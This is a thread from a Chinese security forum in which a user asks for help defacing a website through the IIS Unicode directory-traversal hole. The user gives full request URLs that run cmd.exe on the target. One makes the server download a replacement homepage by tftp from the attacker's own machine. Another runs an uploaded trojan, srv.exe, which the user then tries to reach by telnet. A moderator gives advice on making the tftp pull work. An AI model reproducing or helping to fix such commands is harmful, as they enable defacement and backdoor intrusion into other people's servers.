|
作者: hellosnake [hellosnake] 论坛用户 | 登录 |
我利用unicode漏洞时遇到的问题。。。。 我在我台机子上运行tftpd32.exe 然后用http://网站ip/scripts/..%c0%a9c../winnt/system32/cmd.exe?/c+tftp+-I+我的IP+GET+HEI.HTM+ c:\\inetpub\\wwwroot\\index.htm 这样黑它的主页。。但TFTPD32。EXE没有反应。。。在它的WWWROOT里也看不到我上传的主页。。我在它的 wwwroot里有写权限。。我要上传的主页也在我的tftpd32的目录。。 但不知为什么tftpd32就是没有反应!!! 请教各路高手。。。。小弟这里有礼了。。。。 |
地主 发表时间: 1/12 2:3 |
回复: syshunter [syshunter] 版主 | 登录 |
你要在TFTP32服务器上绑定的是你的外部IP,内部自定义IP客户端是不能直接访问的。 |
B1层 发表时间: 1/12 8:1 |
回复: group [group] 论坛用户 | 登录 |
高见 |
B2层 发表时间: 1/13 0:43 |
回复: hellosnake [hellosnake] 论坛用户 | 登录 |
请问何为外部IP。。是不是我用WINIPCFG查到的我的IP??? 还有请问:我后来用ECHO上传了我的木马:SRV。EXE至它的SCRIPT目录下。。 成功。。但我就是不能执行它。。。用http://远程ip/scripts/srv.exe 或:http://202.100.100.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\srv.exe 然后:telnet xxxxx 99 但不行!!!!!WHY。。。。。 请教各路高手。。。。小弟这里有礼了。。。。 |
B3层 发表时间: 1/13 1:14 |
回复: xjliuwei [xjliuwei] 论坛用户 | 登录 |
有道理!我战成! |
B4层 发表时间: 04-06-09 06:32 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号